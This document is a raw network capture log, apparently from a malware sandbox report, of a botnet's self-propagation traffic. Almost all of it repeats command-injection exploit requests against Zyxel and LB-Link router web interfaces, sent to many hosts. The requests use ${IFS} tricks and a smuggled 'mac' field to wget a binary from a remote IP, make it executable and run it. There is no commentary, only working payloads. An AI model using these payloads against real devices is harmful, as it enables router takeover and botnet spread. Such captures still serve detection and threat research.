                                                      Feb 2, 2024 06:36:02.846326113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6903192.168.2.1456374108.217.95.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.846374989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6904192.168.2.144245876.1.250.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.846415043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6905192.168.2.145017295.247.67.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.846465111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6906192.168.2.1440078130.48.28.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.846503973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6907192.168.2.1446612207.74.221.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.846539021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6908192.168.2.1458046195.41.134.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.846584082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6909192.168.2.1448212140.222.88.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.846627951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6910192.168.2.144875231.117.182.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.846658945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6911192.168.2.1455166173.136.190.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.846705914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6912192.168.2.1450000154.140.245.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.846749067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6913192.168.2.14490222.196.17.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.846800089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6914192.168.2.1442064180.127.133.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.846837044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6915192.168.2.143688413.11.35.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.846882105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6916192.168.2.143882478.188.192.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.846932888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6917192.168.2.144041037.188.138.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.846980095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6918192.168.2.1453860155.241.157.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.847022057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6919192.168.2.143551892.179.167.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.847059011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6920192.168.2.1438558188.237.95.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.847106934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6921192.168.2.1442608155.241.88.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.847147942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6922192.168.2.1449484107.0.78.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.847174883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6923192.168.2.1457240193.241.1.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.847228050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6924192.168.2.144140858.23.43.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.847261906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6925192.168.2.1435094194.79.152.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.847310066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6926192.168.2.1455216205.170.39.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.847359896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6927192.168.2.1453666160.231.120.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.847389936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6928192.168.2.1438340194.136.117.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.847441912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6929192.168.2.145531423.208.31.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.847501040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6930192.168.2.1456496194.128.240.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.847548962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6931192.168.2.1439744209.7.82.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.847600937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6932192.168.2.1448272162.193.32.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.847644091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6933192.168.2.1433968208.253.114.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.847687960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6934192.168.2.143344812.205.251.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.847731113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6935192.168.2.1460766211.92.138.7443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.847765923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6936192.168.2.1456056132.16.162.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.847821951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6937192.168.2.145851075.10.173.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.847851992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6938192.168.2.1447456197.221.77.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.847896099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6939192.168.2.144030480.210.29.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.847940922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6940192.168.2.1451822134.164.5.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.847990036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6941192.168.2.1449416155.221.254.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.848036051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6942192.168.2.14489729.155.202.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.848073959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6943192.168.2.144048652.235.219.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.848119974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6944192.168.2.1449150114.237.2.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.848155975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6945192.168.2.1460082182.249.123.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.848197937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6946192.168.2.1436168109.140.161.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.848239899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6947192.168.2.146070661.120.73.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.848295927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6948192.168.2.144572251.170.198.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.848314047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6949192.168.2.143513235.5.195.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.848368883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6950192.168.2.145086870.57.140.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.848417997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6951192.168.2.1450866219.172.165.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.848474026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6952192.168.2.143977250.54.196.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.848486900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6953192.168.2.1453440163.46.137.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.848535061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6954192.168.2.1441064147.133.56.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.848582983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6955192.168.2.1456200156.230.185.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.848628998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6956192.168.2.1450250195.110.58.2178080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.739638090 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                      Cookie: user=admin
                                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                      Feb 2, 2024 06:36:04.346555948 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                      Cookie: user=admin
                                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                      Feb 2, 2024 06:36:04.544013023 CET339INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Fri, 02 Feb 2024 05:36:04 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6957192.168.2.1447414125.147.254.448080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.825773001 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                      Cookie: user=admin
